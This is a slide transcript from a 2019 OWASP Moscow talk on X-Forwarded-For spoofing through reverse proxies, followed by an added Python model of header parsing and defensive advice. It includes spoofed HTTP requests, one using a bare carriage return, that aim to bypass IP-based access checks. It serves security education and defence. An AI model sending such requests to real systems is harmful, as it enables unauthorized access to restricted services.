"Svoy sredi chuzhikh" (One of Us Among Strangers), Anton Lopanitsyn


Video: https://www.youtube.com/watch?v=JC8hwr9ILQw

OWASP Moscow chapter meetup, 6 December 2019 (https://www.meetup.com/OWASP-Moscow/events/266925142/)


OWASP Moscow

December 06, 2019

Transcript

  1. One of Us Among Strangers. Strangers Among Us

  2. Reverse Proxy

  3. (slide with no text)

  4. X-Forwarded-For: <client>, <proxy>
     X-Forwarded-For: <fake>, <client>, <proxy>

  5. HTTP request

     What the client sends:
       GET / HTTP/1.1
       Host: admin.my.site
       Connection: close

     What the back end receives after the reverse proxy:
       GET / HTTP/1.1
       Host: admin.my.site
       X-Forwarded-For: 123.123.123.123, 192.168.1.1
       Connection: close

     X-Forwarded-For: <client>, <proxy>

  6. XFF/XRI Spoofing

     What the client sends:
       GET / HTTP/1.1
       Host: admin.my.site
       X-Forwarded-For: 127.0.0.1
       Connection: close

     What the back end receives after the reverse proxy:
       GET / HTTP/1.1
       Host: admin.my.site
       X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
       Connection: close

     X-Forwarded-For: <fake>, <client>, <proxy>

  7. HTTP request (line endings shown)

       GET / HTTP/1.1\r\n
       Host: admin.my.site\r\n
       X-Forwarded-For: 127.0.0.1\r\n
       Connection: close\r\n
       \r\n

     X-Forwarded-For: <fake>, <client>, <proxy>

  8. HTTP request with 0d (a bare CR before the CRLF)

       GET / HTTP/1.1\r\n
       Host: admin.my.site\r\n
       X-Forwarded-For: 127.0.0.1\r\r\n
       Connection: close\r\n
       \r\n

     X-Forwarded-For: <fake>\r, <client>, <proxy>

  9. XFF/XRI Spoofing+

     What the client sends:
       GET / HTTP/1.1\r\n
       Host: admin.my.site\r\n
       X-Forwarded-For: 127.0.0.1\r\r\n
       Connection: close\r\n
       \r\n

     What the back end receives after the reverse proxy:
       GET / HTTP/1.1
       Host: admin.my.site
       X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
       Connection: close

     X-Forwarded-For: <fake> , <client>, <proxy>

     Tomcat? WebSphere?

  10. Twitter: @i_bo0om   Site: bo0om.ru   Telegram: @webpwn
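The slides show the XFF chain at three points (what the client sends, what the proxy appends, what the back end finally parses) but not the parsing logic on the application side that makes the spoof succeed or fail. The following is an added example, not code from the talk: a small model of the path client -> proxy A -> proxy B -> application that reproduces slides 5, 6 and 8/9. Addresses are taken from the slides (client 123.123.123.123, proxy 192.168.1.1); the second proxy 192.168.1.2 is an assumption added so that the chain the application sees matches the slide's "<client>, <proxy>". The proxy model assumes a proxy that keeps everything before the terminating CRLF as the header value, so a lone CR survives (which real proxies behave this way is not stated on the slides), and `decode_cr_terminates` is a hypothetical lenient back-end parser standing in for the "Tomcat? WebSphere?" question, not a claim about either product.

```python
"""Model of X-Forwarded-For (XFF) handling on the path
client -> proxy A -> proxy B -> application.

Added example, not the talk's code. Addresses follow the slides; the second
proxy (192.168.1.2) and the parser behaviours are assumptions, see comments.
"""
from typing import Callable, List, Optional, Set

# Constructed: the hops we operate ourselves. Anything not in this set is
# an untrusted source when the XFF chain is read from right to left.
TRUSTED_PROXIES: Set[str] = {"192.168.1.1", "192.168.1.2"}


def proxy_append(raw_xff: Optional[bytes], peer_ip: str) -> bytes:
    """A reverse proxy appends the address it accepted the TCP connection
    from (what nginx's $proxy_add_x_forwarded_for does), creating the header
    if the client did not send one. Assumption for this model: the proxy ends
    the header line at CRLF only, so a lone CR left inside the value by the
    client is kept and the real client address is appended after it."""
    peer = peer_ip.encode("ascii")
    return peer if raw_xff is None else raw_xff + b", " + peer


def split_chain(value: str) -> List[str]:
    """'a, b ,c' -> ['a', 'b', 'c'] (empty elements dropped)."""
    return [hop.strip(" \t") for hop in value.split(",") if hop.strip(" \t")]


def client_ip_leftmost(xff: Optional[str], peer_ip: str) -> str:
    """Common but wrong: take the leftmost hop, which is whatever the client
    put in the header (slide 6: <fake>, <client>, <proxy> yields <fake>)."""
    return split_chain(xff)[0] if xff else peer_ip


def client_ip_rightmost_untrusted(xff: Optional[str], peer_ip: str,
                                  trusted: Set[str] = TRUSTED_PROXIES) -> str:
    """Walk the chain from the right, skipping hops that are our own proxies;
    the first hop we do not own is the client. If the TCP peer itself is not
    one of our proxies, the header did not pass through us and is ignored."""
    if peer_ip not in trusted:
        return peer_ip
    for hop in reversed(split_chain(xff or "")):
        if hop not in trusted:
            return hop
    return peer_ip  # chain contained only our own hops


def decode_strict(raw: bytes) -> str:
    """Reject a field value containing a bare CR or LF (RFC 7230 allows
    neither inside a field value); this blocks the slide-8 request outright."""
    if b"\r" in raw or b"\n" in raw:
        raise ValueError("bare CR/LF inside header value")
    return raw.decode("ascii")


def decode_cr_terminates(raw: bytes) -> str:
    """Hypothetical lenient parser that ends the field value at the first CR.
    This models the behaviour slide 9 asks about; it is an assumption, not a
    statement about Tomcat, WebSphere or any other server."""
    return raw.split(b"\r", 1)[0].decode("ascii")


def app_view(client_xff: Optional[bytes],
             decoder: Callable[[bytes], str]) -> str:
    """Send one request through proxy A (sees the client) and proxy B (sees
    proxy A), then return the client IP the application derives with the
    right-to-left parser, using `decoder` to turn raw bytes into the value."""
    after_a = proxy_append(client_xff, "123.123.123.123")  # slide's <client>
    after_b = proxy_append(after_a, "192.168.1.1")         # slide's <proxy>
    return client_ip_rightmost_untrusted(decoder(after_b), peer_ip="192.168.1.2")


if __name__ == "__main__":
    chain = "127.0.0.1, 123.123.123.123, 192.168.1.1"          # slide 6
    print("leftmost:          ", client_ip_leftmost(chain, "192.168.1.2"))
    print("rightmost-untrusted:", client_ip_rightmost_untrusted(chain, "192.168.1.2"))
    print("slide 8, lenient:  ", app_view(b"127.0.0.1\r", decode_cr_terminates))
    try:
        app_view(b"127.0.0.1\r", decode_strict)
    except ValueError as exc:
        print("slide 8, strict:    rejected:", exc)
```

The right-to-left walk over a known set of proxy addresses defeats the plain spoof of slide 6, but only as long as the application actually sees the whole chain: if the back end's header parser stops at the stray CR from slide 8, the appended `<client>, <proxy>` part is lost and even the correct walk returns `127.0.0.1`. Two checks follow from this: the application must refuse field values with bare CR or LF rather than tolerating them, and the proxy should be configured to overwrite `X-Forwarded-For` (or set a separate header the client cannot influence) instead of appending to whatever the client sent.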